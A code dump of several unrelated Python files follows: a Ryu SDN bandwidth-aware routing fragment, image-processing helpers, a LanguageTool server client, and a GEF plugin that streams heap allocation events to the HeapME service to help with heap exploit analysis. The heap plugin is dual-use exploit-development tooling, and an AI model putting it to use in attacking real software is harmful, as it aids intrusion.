self.awareness.link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
self.free_bandwidth = {dpid:{port_no:free_bw,},} Unit:Kbit/s
'''
src_dp = self.awareness.get_host_location(flow['src'])[0]
dst_dp = self.awareness.get_host_location(flow['dst'])[0]
paths = self.awareness.shortest_paths.get(src_dp).get(dst_dp)
GFF_route = None
for path in paths:
fitCheck = True
for i in xrange(len(path) - 1):
fitCheck = False
if self.awareness.link_to_port.has_key((path[i], path[i+1])):
src_port = self.awareness.link_to_port[(path[i], path[i+1])][0]
if self.free_bandwidth.has_key(path[i]) and self.free_bandwidth[path[i]].has_key(src_port):
if (self.free_bandwidth[path[i]][src_port] / setting.MAX_CAPACITY) < flow['demand']:
break
else:
fitCheck = True
if fitCheck == True:
GFF_route = path
# self.logger.info("[GFF PATH]%s<-->%s: %s" % (flow['src'], flow['dst'], path))
break
if GFF_route:
# Install new GFF_path flow entries.
# self.logger.info("[GFF INSTALLING]%s<-->%s: %s" % (flow['src'], flow['dst'], path))
self._install_GFF_path(GFF_route, flow['match'], flow['priority'], flow['src'])
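# Illustrative walk-through (not part of the original module): for a candidate
# path [1, 2, 3], the check above looks up the egress ports
# link_to_port[(1, 2)][0] and link_to_port[(2, 3)][0], and requires
# free_bandwidth[dpid][port] / MAX_CAPACITY >= flow['demand'] on every hop.
# The first path that satisfies this on all links becomes GFF_route and has
# its flow entries installed; otherwise the flow keeps its current path.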
def _install_GFF_path(self, GFF_route, match, priority, ip_dst):
'''
Installing the Global First Fit path.
"match": {"dl_type": 2048, "in_port": 3,
"ipv4_src": "10.1.0.1", "ipv4_dst": "10.8.0.2"}
flow_info = (eth_type, src_ip, dst_ip, priority)
'''
flow_info = (match['eth_type'], match['ipv4_src'], match['ipv4_dst'], priority)
# Install flow entries to datapaths along the path.
self.install_flow(self.datapaths, self.awareness.link_to_port, GFF_route, ip_dst, flow_info)
def install_flow(self, datapaths, link_to_port, path, ip_dst, flow_info):
'''
Install flow entries for datapaths.
path=[dpid1, dpid2, ...]
flow_info = (eth_type, src_ip, dst_ip, priority)
self.awareness.access_table = {(sw,port):(ip, mac),}
'''
Pathlen = len(path)
if Pathlen == 0:
self.logger.info("Path error!")
return
in_port = flow_info[3]
first_dp = datapaths[path[0]]
port_pair = self.get_port_pair_from_link(link_to_port, path[0], path[1])
# install flow entry of the second switch to the last switch
for i in xrange(1, Pathlen - 1):
port = self.get_port_pair_from_link(link_to_port, path[i - 1], path[i])
if (i < Pathlen - 1):
port_next = self.get_port_pair_from_link(link_to_port, path[i], path[i + 1])
else:
port_next = self.awareness.get_host_location(ip_dst)[1]
if port and port_next:
src_port = port[1]
if (i < Pathlen - 1):
dst_port = port_next[0]
else:
dst_port = port_next
datapath = datapaths[path[i]]
self.send_flow_mod(datapath, flow_info, src_port, dst_port)
if port_pair is None:
self.logger.info("Port not found in first hop.")
return
out_port = port_pair[0]
self.send_flow_mod(first_dp, flow_info, in_port, out_port)
def get_port_pair_from_link(self, link_to_port, src_dpid, dst_dpid):
"""
Get port pair of link, so that controller can install flow entry.
link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
"""
if (src_dpid, dst_dpid) in link_to_port:
return link_to_port[(src_dpid, dst_dpid)]
else:
self.logger.info("Link from dpid:%s to dpid:%s is not in links" %
(src_dpid, dst_dpid))
return None
def send_flow_mod(self, datapath, flow_info, src_port, dst_port):
"""
Build flow entry, and send it to datapath.
flow_info = (eth_type, src_ip, dst_ip, priority)
"""
parser = datapath.ofproto_parser
actions = []
actions.append(parser.OFPActionOutput(dst_port))
if len(flow_info) == 7:
if flow_info[-3] == 6:
if flow_info[-2] == 'src':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=6, tcp_src=flow_info[-1])
elif flow_info[-2] == 'dst':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=6, tcp_dst=flow_info[-1])
else:
pass
elif flow_info[-3] == 17:
if flow_info[-2] == 'src':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=17, udp_src=flow_info[-1])
elif flow_info[-2] == 'dst':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=17, udp_dst=flow_info[-1])
else:
pass
elif len(flow_info) == 4:
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2])
else:
pass
priority = flow_info[3] + 1
self.add_flow(datapath, priority, match, actions,
idle_timeout=1, hard_timeout=0)
def add_flow(self, dp, priority, match, actions, idle_timeout=5, hard_timeout=60):
"""
Send a flow entry to datapath.
"""
ofproto = dp.ofproto
parser = dp.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
mod = parser.OFPFlowMod(datapath=dp, priority=priority,
idle_timeout=idle_timeout,
hard_timeout=hard_timeout,
match=match, instructions=inst)
dp.send_msg(mod)
def _request_stats(self, datapath):
"""
Send stats request messages to the datapath.
"""
self.logger.debug('send stats request: %016x', datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortDescStatsRequest(datapath, 0)
datapath.send_msg(req)
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
req = parser.OFPFlowStatsRequest(datapath)
datapath.send_msg(req)
def get_min_bw_of_links(self, graph, path, min_bw):
"""
Get the bandwidth of a path. The minimum bandwidth among its
links is the path's bandwidth, because that link is the bottleneck of the path.
"""
_len = len(path)
if _len > 1:
minimal_band_width = min_bw
for i in xrange(_len-1):
pre, curr = path[i], path[i+1]
if 'bandwidth' in graph[pre][curr]:
bw = graph[pre][curr]['bandwidth']
minimal_band_width = min(bw, minimal_band_width)
else:
continue
return minimal_band_width
else:
return min_bw
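# Illustrative example (not part of the original module): for path [1, 2, 3]
# with graph[1][2]['bandwidth'] == 800 and graph[2][3]['bandwidth'] == 500
# (Kbit/s), the path bandwidth is min(800, 500) == 500, i.e. the bottleneck
# link. get_best_path_by_bw() below then prefers the candidate path whose
# bottleneck bandwidth is largest.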
def get_best_path_by_bw(self, graph, paths):
"""
Get best path by comparing paths.
Note: This function is called in EFattree module.
"""
capabilities = {}
best_paths = copy.deepcopy(paths)
for src in paths:
for dst in paths[src]:
if src == dst:
best_paths[src][src] = [src]
capabilities.setdefault(src, {src: setting.MAX_CAPACITY})
capabilities[src][src] = setting.MAX_CAPACITY
else:
max_bw_of_paths = 0
best_path = paths[src][dst][0]
for path in paths[src][dst]:
min_bw = setting.MAX_CAPACITY
min_bw = self.get_min_bw_of_links(graph, path, min_bw)
if min_bw > max_bw_of_paths:
max_bw_of_paths = min_bw
best_path = path
best_paths[src][dst] = best_path
capabilities.setdefault(src, {dst: max_bw_of_paths})
capabilities[src][dst] = max_bw_of_paths
# self.capabilities and self.best_paths have no actual utility in this module.
self.capabilities = capabilities
self.best_paths = best_paths
return capabilities, best_paths
def create_bw_graph(self, bw_dict):
"""
Save bandwidth data into networkx graph object.
"""
try:
graph = self.awareness.graph
link_to_port = self.awareness.link_to_port
for link in link_to_port:
(src_dpid, dst_dpid) = link
(src_port, dst_port) = link_to_port[link]
if src_dpid in bw_dict and dst_dpid in bw_dict:
bw_src = bw_dict[src_dpid][src_port]
bw_dst = bw_dict[dst_dpid][dst_port]
bandwidth = min(bw_src, bw_dst)
# Add key:value pair of bandwidth into graph.
if graph.has_edge(src_dpid, dst_dpid):
graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
# else:
# graph.add_edge(src_dpid, dst_dpid)
# graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
# else:
# if graph.has_edge(src_dpid, dst_dpid):
# graph[src_dpid][dst_dpid]['bandwidth'] = 0
# else:
# graph.add_edge(src_dpid, dst_dpid)
# graph[src_dpid][dst_dpid]['bandwidth'] = 0
return graph
except:
self.logger.info("Create bw graph exception")
if self.awareness is None:
self.awareness = lookup_service_brick('awareness')
return self.awareness.graph
def _save_freebandwidth(self, dpid, port_no, speed):
"""
Calculate the free bandwidth of a port and save it.
port_feature = (config, state, p.curr_speed)
self.port_features[dpid][p.port_no] = port_feature
self.free_bandwidth = {dpid:{port_no:free_bw,},}
"""
port_state = self.port_features.get(dpid).get(port_no)
if port_state:
capacity = setting.MAX_CAPACITY # The true bandwidth of link, instead of 'curr_speed'.
free_bw = self._get_free_bw(capacity, speed)
self.free_bandwidth[dpid].setdefault(port_no, None)
self.free_bandwidth[dpid][port_no] = free_bw
else:
self.logger.info("Port is Down")
def _save_stats(self, _dict, key, value, length=5):
if key not in _dict:
_dict[key] = []
_dict[key].append(value)
if len(_dict[key]) > length:
_dict[key].pop(0)
def _get_speed(self, now, pre, period):
if period:
return (now - pre) / (period)
else:
return 0
def _get_free_bw(self, capacity, speed):
# freebw: Kbit/s
return max(capacity - speed * 8 / 1000.0, 0)
def _get_time(self, sec, nsec):
return sec + nsec / 1000000000.0
def _get_period(self, n_sec, n_nsec, p_sec, p_nsec):
return self._get_time(n_sec, n_nsec) - self._get_time(p_sec, p_nsec)
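# Worked example (illustrative, not part of the original module): if two port
# samples are taken 10 s apart (duration 20 s -> 30 s) and tx_bytes grows from
# 1,000,000 to 6,000,000, then _get_speed() gives 5,000,000 / 10 = 500,000 B/s,
# which is 500,000 * 8 / 1000 = 4,000 Kbit/s of traffic. Assuming, say,
# setting.MAX_CAPACITY == 10000 (Kbit/s), _get_free_bw() reports
# 10000 - 4000 = 6000 Kbit/s of free bandwidth on that port.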
def show_stat(self, _type):
'''
Show statistics information according to data type.
_type: 'port' / 'flow'
'''
if setting.TOSHOW is False:
return
bodys = self.stats[_type]
if _type == 'flow':
print('\ndatapath '
'priority ip_src ip_dst '
' packets bytes flow-speed(Kb/s)')
print('-------- '
'-------- ------------ ------------ '
'--------- ----------- ----------------')
for dpid in sorted(bodys.keys()):
for stat in sorted([flow for flow in bodys[dpid] if ((flow.priority not in [0, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
print('%8d %8s %12s %12s %9d %11d %16.1f' % (
dpid,
stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'),
stat.packet_count, stat.byte_count,
abs(self.flow_speed[dpid][(stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'))][-1])*8/1000.0))
print
if _type == 'port':
print('\ndatapath port '
' rx-pkts rx-bytes '' tx-pkts tx-bytes '
' port-bw(Kb/s) port-speed(b/s) port-freebw(Kb/s) '
' port-state link-state')
print('-------- ---- '
'--------- ----------- ''--------- ----------- '
'------------- --------------- ----------------- '
'---------- ----------')
_format = '%8d %4x %9d %11d %9d %11d %13d %15.1f %17.1f %10s %10s'
for dpid in sorted(bodys.keys()):
for stat in sorted(bodys[dpid], key=attrgetter('port_no')):
if stat.port_no != ofproto_v1_3.OFPP_LOCAL:
print(_format % (
dpid, stat.port_no,
stat.rx_packets, stat.rx_bytes,
stat.tx_packets, stat.tx_bytes,
setting.MAX_CAPACITY,
abs(self.port_speed[(dpid, stat.port_no)][-1] * 8),
self.free_bandwidth[dpid][stat.port_no],
self.port_features[dpid][stat.port_no][0],
self.port_features[dpid][stat.port_no][1]))
print
|
imagetools.py
|
# -*- coding=UTF-8 -*-
# pyright: strict
"""tools for image processing. """
import hashlib
import threading
from pathlib import Path
from typing import Any, Callable, Dict, Literal, Optional, Text, Tuple, Union
import cast_unknown as cast
import cv2
import cv2.img_hash
import numpy as np
from PIL.Image import BICUBIC, Image, fromarray
def md5(b_img: np.ndarray, *, save_path: Optional[Text] = None) -> Text:
_id = hashlib.md5(b_img.tobytes()).hexdigest()
if save_path:
dst = Path(save_path) / _id[0] / _id[1:3] / (_id[3:] + ".png")
if not dst.exists():
dst.parent.mkdir(parents=True, exist_ok=True)
fromarray(b_img).convert("1").save(dst)
return _id
_HASH_ALGORITHM = cv2.img_hash.BlockMeanHash_create()
def image_hash(img: Image, *, save_path: Optional[Text] = None) -> Text:
cv_img = np.asarray(img.convert("L"))
h = _HASH_ALGORITHM.compute(cv_img).tobytes().hex()
if save_path:
md5_hash = hashlib.md5(img.tobytes()).hexdigest()
dst = Path(save_path) / h[0] / h[1:3] / h[3:] / (md5_hash + ".png")
if not dst.exists():
dst.parent.mkdir(parents=True, exist_ok=True)
img.convert("RGB").save(dst)
return h
def compare_hash(a: Text, b: Text) -> float:
if a == b:
return 1.0
cv_a = np.array(list(bytes.fromhex(a)), np.uint8)
cv_b = np.array(list(bytes.fromhex(b)), np.uint8)
res = _HASH_ALGORITHM.compare(cv_a, cv_b)
return 1 - (res / (len(a) * 2))
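# Illustrative usage sketch (not part of the original module): hash two small
# in-memory images and compare them. An image compared against itself scores
# 1.0, while a clearly different image usually scores much lower. The image
# sizes and pixel values here are arbitrary examples.
def _example_image_hash() -> Tuple[float, float]:
    black = fromarray(np.zeros((64, 64, 3), dtype=np.uint8))
    noisy = fromarray(np.random.randint(0, 256, (64, 64, 3), dtype=np.uint8))
    h_black, h_noisy = image_hash(black), image_hash(noisy)
    return compare_hash(h_black, h_black), compare_hash(h_black, h_noisy)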
def _cast_float(v: Any) -> float:
return float(v)
def cv_image(img: Image) -> np.ndarray:
if img.mode == "RGB":
return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
if img.mode == "L":
return np.array(img)
raise ValueError("cv_image: unsupported mode: %s" % img.mode)
def pil_image(img: np.ndarray) -> Image:
if img.shape[2:] == (3,):
return fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
return fromarray(img)
def compare_color(
a: Union[Tuple[int, ...], int], b: Union[Tuple[int, ...], int], *, bit_size: int = 8
) -> float:
max_value = (1 << bit_size) - 1
t_a = tuple(cast.list_(a, (int,)))
t_b = tuple(cast.list_(b, (int,)))
if len(t_a) != len(t_b):
return 0
return max(
1
- _cast_float(
np.sqrt(_cast_float(np.sum((np.array(t_a) - np.array(t_b)) ** 2, axis=0)))
)
/ max_value,
0,
)
def level(
img: np.ndarray, black: np.ndarray, white: np.ndarray, *, bit_size: int = 8
) -> np.ndarray:
max_value = (1 << bit_size) - 1
return np.clip((img - black) / (white - black) * max_value, 0, max_value).astype(
img.dtype
)
def color_key(
img: np.ndarray, color: np.ndarray, threshold: float = 0.8, bit_size: int = 8
) -> np.ndarray:
max_value = (1 << bit_size) - 1
assert img.shape == color.shape, (img.shape, color.shape)
if len(img.shape) == 2:
img = img[..., np.newaxis]
color = color[..., np.newaxis]
# doing it this way is somehow faster than
# `numpy.linalg.norm(img.astype(int) - color.astype(int), axis=2,).clip(0, 255).astype(np.uint8)`
diff_img = (
np.asarray(
np.sqrt(
np.asarray(np.sum((img.astype(int) - color.astype(int)) ** 2, axis=2))
)
)
.clip(0, 255)
.astype(img.dtype)
)
ret = max_value - diff_img
if threshold > 0:
mask_img = (ret > (max_value * threshold)).astype(img.dtype)
ret *= mask_img
ret = ret.clip(0, 255)
ret = ret.astype(img.dtype)
return ret
def constant_color_key(
img: np.ndarray, *colors: Tuple[int, ...], threshold: float = 0.8, bit_size: int = 8
) -> np.ndarray:
ret = np.zeros(img.shape[:2], dtype=img.dtype)
for color in colors:
match_img = color_key(
img, np.full_like(img, color), threshold=threshold, bit_size=bit_size
)
ret = np.array(np.maximum(ret, match_img))
return ret
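# Illustrative usage sketch (not part of the original module): keying a tiny
# one-row BGR image on pure red keeps the red pixel at 255 and masks the blue
# pixel to 0 under the default 0.8 threshold.
def _example_constant_color_key() -> np.ndarray:
    img = np.array([[[0, 0, 255], [255, 0, 0]]], dtype=np.uint8)  # red, blue (BGR)
    return constant_color_key(img, (0, 0, 255))  # -> array([[255, 0]], dtype=uint8)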
def sharpen(img: np.ndarray, size: int = 1, *, bit_size: int = 8) -> np.ndarray:
return cv2.filter2D(
img, bit_size, np.array(((-1, -1, -1), (-1, 9, -1), (-1, -1, -1))) * size
)
def mix(a: np.ndarray, b: np.ndarray, a_mix: float) -> np.ndarray:
total_ratio = 10000
a_ratio = int(a_mix * total_ratio)
b_ratio = total_ratio - a_ratio
return ((a.astype(int) * a_ratio + b.astype(int) * b_ratio) / total_ratio).astype(
a.dtype
)
def border_flood_fill(
cv_img: np.ndarray, color: Tuple[int, ...] = (255,)
) -> np.ndarray:
h, w = cv_img.shape[:2]
border_points = (
*((0, i) for i in range(h)),
*((i, 0) for i in range(w)),
*((w - 1, i) for i in range(h)),
*((i, h - 1) for i in range(w)),
)
fill_mask_img = cv2.copyMakeBorder(cv_img, 1, 1, 1, 1, cv2.BORDER_CONSTANT)
bg_mask_img = np.zeros_like(cv_img)
for i in border_points:
x, y = i
if cv_img[y, x] != 0:
continue
cv2.floodFill(bg_mask_img, fill_mask_img, (x, y), color, 0, 0)
return bg_mask_img
def bg_mask_by_outline(outline_img: np.ndarray) -> np.ndarray:
return border_flood_fill(outline_img)
def resize(
img: Image,
*,
height: Optional[int] = None,
width: Optional[int] = None,
resample: int = BICUBIC,
) -> Image:
if height and width:
return img.resize((width, height), resample=resample)
w, h = img.width, img.height
if height:
w = round(height * (w / h))
h = height
elif width:
h = round(width * (h / w))
w = width
return img.resize((w, h), resample=resample)
def fill_area(
img: np.ndarray,
color: Tuple[int, ...],
*,
mode: int = cv2.RETR_EXTERNAL,
size_lt: int,
):
contours, _ = cv2.findContours(
(img * 255).astype(np.uint8), mode, cv2.CHAIN_APPROX_NONE
)
for i in contours:
size = cv2.contourArea(i)
if size < size_lt:
cv2.drawContours(img, [i], -1, color, cv2.FILLED)
_WINDOW_ID: Dict[Literal["value"], int] = {"value": 0}
def show(img: Image, title: Text = "") -> Callable[[], None]:
stop_event = threading.Event()
stop_event.is_set()
_WINDOW_ID["value"] += 1
title = f"{title} - {_WINDOW_ID['value']}"
def _run():
cv_img = np.asarray(img)
try:
cv2.imshow(title, cv_img)
while not stop_event.is_set() and cv2.getWindowProperty(title, 0) >= 0:
if cv2.pollKey() == "q":
break
finally:
cv2.destroyWindow(title)
t = threading.Thread(target=_run, daemon=True)
t.start()
def _close():
stop_event.set()
t.join()
return _close
|
server.py
|
import atexit
import http.client
import json
import re
import socket
import threading
import urllib.parse
from weakref import WeakValueDictionary
from .download_lt import download_lt
from .language_tag import LanguageTag
from .match import Match
from .utils import *
DEBUG_MODE = False
# Keep track of running server processes in a global list. This way,
# we can ensure they're terminated on exit.
RUNNING_SERVER_PROCESSES = []
class LanguageTool:
""" Main class used for checking text against different rules.
LanguageTool v2 API documentation: https://languagetool.org/http-api/swagger-ui/#!/default/post_check
"""
_HOST = socket.gethostbyname('localhost')
_MIN_PORT = 8081
_MAX_PORT = 8999
_TIMEOUT = 5 * 60
_remote = False
_port = _MIN_PORT
_server = None
_consumer_thread = None
_instances = WeakValueDictionary()
_PORT_RE = re.compile(r"(?:https?://.*:|port\s+)(\d+)", re.I)
def __init__(self, language=None, motherTongue=None, remote_server=None, newSpellings=None, new_spellings_persist=True):
self._new_spellings = None
self._new_spellings_persist = new_spellings_persist
if remote_server is not None:
self._remote = True
self._url = parse_url(remote_server)
self._url = urllib.parse.urljoin(self._url, 'v2/')
self._update_remote_server_config(self._url)
elif not self._server_is_alive():
self._start_server_on_free_port()
if language is None:
try:
language = get_locale_language()
except ValueError:
language = FAILSAFE_LANGUAGE
if newSpellings:
self._new_spellings = newSpellings
self._register_spellings(self._new_spellings)
self._language = LanguageTag(language, self._get_languages())
self.motherTongue = motherTongue
self.disabled_rules = set()
self.enabled_rules = set()
self.disabled_categories = set()
self.enabled_categories = set()
self.enabled_rules_only = False
self._instances[id(self)] = self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def __repr__(self):
return '{}(language={!r}, motherTongue={!r})'.format(
self.__class__.__name__, self.language, self.motherTongue)
def close(self):
if not self._instances and self._server_is_alive():
self._terminate_server()
if not self._new_spellings_persist and self._new_spellings:
self._unregister_spellings()
self._new_spellings = []
@property
def language(self):
"""The language to be used."""
return self._language
@language.setter
def language(self, language):
self._language = LanguageTag(language, self._get_languages())
self.disabled_rules.clear()
self.enabled_rules.clear()
@property
def motherTongue(self):
"""The user's mother tongue or None.
The mother tongue may also be used as a source language for
checking bilingual texts.
"""
return self._motherTongue
@motherTongue.setter
def motherTongue(self, motherTongue):
self._motherTongue = (None if motherTongue is None
else LanguageTag(motherTongue, self._get_languages()))
@property
def _spell_checking_categories(self):
return {'TYPOS'}
def check(self, text: str) -> [Match]:
"""Match text against enabled rules."""
url = urllib.parse.urljoin(self._url, 'check')
response = self._query_server(url, self._encode(text))
matches = response['matches']
return [Match(match) for match in matches]
def _encode(self, text):
params = {'language': self.language, 'text': text.encode('utf-8')}
if self.motherTongue is not None:
params['motherTongue'] = self.motherTongue
if self.disabled_rules:
params['disabledRules'] = ','.join(self.disabled_rules)
if self.enabled_rules:
params['enabledRules'] = ','.join(self.enabled_rules)
if self.enabled_rules_only:
params['enabledOnly'] = 'true'
if self.disabled_categories:
params['disabledCategories'] = ','.join(self.disabled_categories)
if self.enabled_categories:
params['enabledCategories'] = ','.join(self.enabled_categories)
return urllib.parse.urlencode(params).encode()
def correct(self, text: str) -> str:
"""Automatically apply suggestions to the text."""
return correct(text, self.check(text))
def enable_spellchecking(self):
"""Enable spell-checking rules."""
self.disabled_categories.difference_update(self._spell_checking_categories)
def disable_spellchecking(self):
"""Disable spell-checking rules."""
self.disabled_categories.update(self._spell_checking_categories)
@staticmethod
def _get_valid_spelling_file_path() -> str:
library_path = get_language_tool_directory()
spelling_file_path = os.path.join(library_path, "org/languagetool/resource/en/hunspell/spelling.txt")
if not os.path.exists(spelling_file_path):
raise FileNotFoundError("Failed to find the spellings file at {}\n Please file an issue at "
"https://github.com/jxmorris12/language_tool_python/issues"
.format(spelling_file_path))
return spelling_file_path
def _register_spellings(self, spellings):
spelling_file_path = self._get_valid_spelling_file_path()
with open(spelling_file_path, "a+") as spellings_file:
spellings_file.write("\n" + "\n".join([word for word in spellings]))
if DEBUG_MODE:
print("Registered new spellings at {}".format(spelling_file_path))
def _unregister_spellings(self):
spelling_file_path = self._get_valid_spelling_file_path()
with open(spelling_file_path, 'r+') as spellings_file:
spellings_file.seek(0, os.SEEK_END)
for _ in range(len(self._new_spellings)):
while spellings_file.read(1) != '\n':
spellings_file.seek(spellings_file.tell() - 2, os.SEEK_SET)
spellings_file.seek(spellings_file.tell() - 2, os.SEEK_SET)
spellings_file.seek(spellings_file.tell() + 1, os.SEEK_SET)
spellings_file.truncate()
if DEBUG_MODE:
print("Unregistered new spellings at {}".format(spelling_file_path))
def _get_languages(self) -> set:
"""Get supported languages (by querying the server)."""
self._start_server_if_needed()
url = urllib.parse.urljoin(self._url, 'languages')
languages = set()
for e in self._query_server(url, num_tries=1):
languages.add(e.get('code'))
languages.add(e.get('longCode'))
return languages
def _start_server_if_needed(self):
# Start server.
if not self._server_is_alive() and self._remote is False:
self._start_server_on_free_port()
def _update_remote_server_config(self, url):
self._url = url
self._remote = True
def _query_server(self, url, data=None, num_tries=2):
if DEBUG_MODE:
print('_query_server url:', url, 'data:', data)
for n in range(num_tries):
try:
with urlopen(url, data, self._TIMEOUT) as f:
raw_data = f.read().decode('utf-8')
try:
return json.loads(raw_data)
except json.decoder.JSONDecodeError as e:
print(f'URL {url} and data {data} returned invalid JSON response:')
print(raw_data)
raise e
except (IOError, http.client.HTTPException) as e:
if self._remote is False:
self._terminate_server()
self._start_local_server()
if n + 1 >= num_tries:
raise LanguageToolError('{}: {}'.format(self._url, e))
def _start_server_on_free_port(self):
while True:
self._url = 'http://{}:{}/v2/'.format(self._HOST, self._port)
try:
self._start_local_server()
break
except ServerError:
if self._MIN_PORT <= self._port < self._MAX_PORT:
self._port += 1
else:
raise
def _start_local_server(self):
# Before starting local server, download language tool if needed.
download_lt()
err = None
try:
server_cmd = get_server_cmd(self._port)
except PathError as e:
# Can't find path to LanguageTool.
err = e
else:
# Need to PIPE all handles: http://bugs.python.org/issue3905
self._server = subprocess.Popen(
server_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
startupinfo=startupinfo
)
global RUNNING_SERVER_PROCESSES
RUNNING_SERVER_PROCESSES.append(self._server)
match = None
while True:
line = self._server.stdout.readline()
if not line:
break
match = self._PORT_RE.search(line)
if match:
port = int(match.group(1))
if port != self._port:
raise LanguageToolError('requested port {}, but got {}'.format(
self._port, port))
break
if not match:
err_msg = self._terminate_server()
match = self._PORT_RE.search(err_msg)
if not match:
raise LanguageToolError(err_msg)
port = int(match.group(1))
if port != self._port:
raise LanguageToolError(err_msg)
if self._server:
self._consumer_thread = threading.Thread(
target=lambda: _consume(self._server.stdout))
self._consumer_thread.daemon = True
self._consumer_thread.start()
else:
# Couldn't start the server, so maybe there is already one running.
raise ServerError('Server running; don\'t start a server here.')
def _server_is_alive(self):
return self._server and self._server.poll() is None
def _terminate_server(self):
LanguageToolError_message = ''
try:
self._server.terminate()
except OSError:
pass
try:
LanguageToolError_message = self._server.communicate()[1].strip()
except (IOError, ValueError):
pass
try:
self._server.stdout.close()
except IOError:
pass
try:
self._server.stdin.close()
except IOError:
pass
try:
self._server.stderr.close()
except IOError:
pass
self._server = None
return LanguageToolError_message
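# Illustrative usage sketch, not part of this module: a minimal check/correct
# round trip against a locally started LanguageTool server. The Match attribute
# names used here (ruleId, replacements) follow the public language_tool_python
# API and are an assumption, not something defined in this file.
def _example_usage() -> str:
    with LanguageTool('en-US') as tool:
        for match in tool.check('This are a example.'):
            print(match.ruleId, match.replacements[:3])
        return tool.correct('This are a example.')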
class LanguageToolPublicAPI(LanguageTool):
""" Language tool client of the official API. """
def __init__(self, *args, **kwargs):
super().__init__(*args, remote_server='https://languagetool.org/api/', **kwargs)
@atexit.register
def terminate_server():
"""Terminate the server."""
for proc in RUNNING_SERVER_PROCESSES:
proc.terminate()
def _consume(stdout):
"""Consume/ignore the rest of the server output.
Without this, the server will end up hanging due to the buffer
filling up.
"""
while stdout.readline():
pass
|
heapme.py
|
"""
Heap Made Easy - Heap Analysis and Collaboration Tool
https://heapme.f2tc.com/
HeapME is a tool that helps simplify heap analysis and collaboration through an intuitive web interface.
Features:
- GEF patches that allow scripts to register functions for malloc, calloc, realloc and free events.
- An HTTP Log Server that receives logs sent from the exploit code and uploads them in the correct order.
@htejeda
"""
import time
import json
import requests
import socketio
import threading
import asyncio
import os
from aiohttp import web
heapme_is_authorized = False
heapme_is_running = False
sio = socketio.Client()
"""
Allow overriding default log listening host and port with environment variables
"""
LOG_SRV_HOST = os.getenv('LOG_SRV_HOST') or '127.0.0.1'
LOG_SRV_PORT = int(os.getenv('LOG_SRV_PORT') or 4327)
@register_command
class HeapMe(GenericCommand):
"""Heap Made Easy
init -- Connect to the HeapMe URL and begin tracking dynamic heap allocation
watch -- Update the heap layout when the watched breakpoint is hit
push -- Upload all events to the HeapME URL
"""
_cmdline_ = "heapme"
_syntax_ = "{:s} (init|watch|push)".format(_cmdline_)
def __init__(self):
super(HeapMe, self).__init__(prefix=True)
return
@only_if_gdb_running
def do_invoke(self, argv):
self.usage()
return
@register_command
class HeapMeInit(GenericCommand):
"""Connect to the HeapMe URL and begins tracking dynamic heap allocation"""
_cmdline_ = "heapme init"
_syntax_ = "{:s} <url> <id> <key>".format(_cmdline_)
_example_ = "{0:s} https://heapme.f2tc.com 5e7f8edea867881836775db1 e50b08b0-711c-11ea-9d36-a18c10d09858".format(_cmdline_)
@only_if_gdb_running
def do_invoke(self, argv):
if not argv or len(argv) != 3:
self.usage()
return
print(r"""
_ _ __ __ _____
| | | | ___ __ _ _ __ | \/ | ____|
| |_| |/ _ \/ _` | '_ \| |\/| | _|
| _ | __/ (_| | |_) | | | | |___
|_| |_|\___|\__,_| .__/|_| |_|_____|
|_|
""".center(40))
_heapme_url = argv[0]
_heapme_id = argv[1]
_heapme_key = argv[2]
if _heapme_url.endswith('/'):
_heapme_url = _heapme_url[:-1]
_heapme_url = "{0:s}/{1:s}/{2:s}".format(_heapme_url, _heapme_id, _heapme_key)
req = requests.get(_heapme_url)
data = req.json()
if 'result' in data:
warn("{0}: {1} - {2}".format(
Color.colorify("HeapME", "blue"),
Color.colorify(_heapme_url, "underline blue"),
Color.colorify(data['result'], "red")
))
return False
if not data['is_empty']:
if not self.confirm("oOps!, the specified URL contains data of previous analysis, do you want to overwrite it? [y/n] "):
print("Bye!")
return
sio.connect(_heapme_url)
sio.emit('address', { 'id': _heapme_id, 'key': _heapme_key })
while not heapme_is_authorized:
time.sleep(1)
ok("{0}: connected to {1}".format(
Color.colorify("HeapME", "blue"),
Color.colorify(argv[0], "underline blue"),
))
set_gef_setting("heapme.enabled", True, bool, "HeapME is Enabled")
set_gef_setting("heapme.verbose", False, bool, "HeapME verbose mode")
_sec = checksec(get_filepath())
heapme_push({
'type': 'begin',
'filepath': get_filepath(),
'checksec': {
'Canary': _sec["Canary"],
'NX': _sec["NX"],
'PIE': _sec["PIE"],
'Fortify': _sec["Fortify"],
'RelRO': "Full" if _sec["Full RelRO"] else "Partial" if _sec["Partial RelRO"] else "No"
}
})
gef_on_exit_hook(self.clean)
@gef_heap_event("__libc_malloc", "__libc_calloc", "__libc_realloc", "__libc_free")
def heap_event(**kwargs):
if not get_gef_setting("heapme.enabled"):
return
heapme_push({
"type": kwargs["name"],
"data": {
"address": kwargs["address"],
"size": -1 if kwargs["name"] == "__libc_free" else kwargs["size"]
}
})
heapme_update()
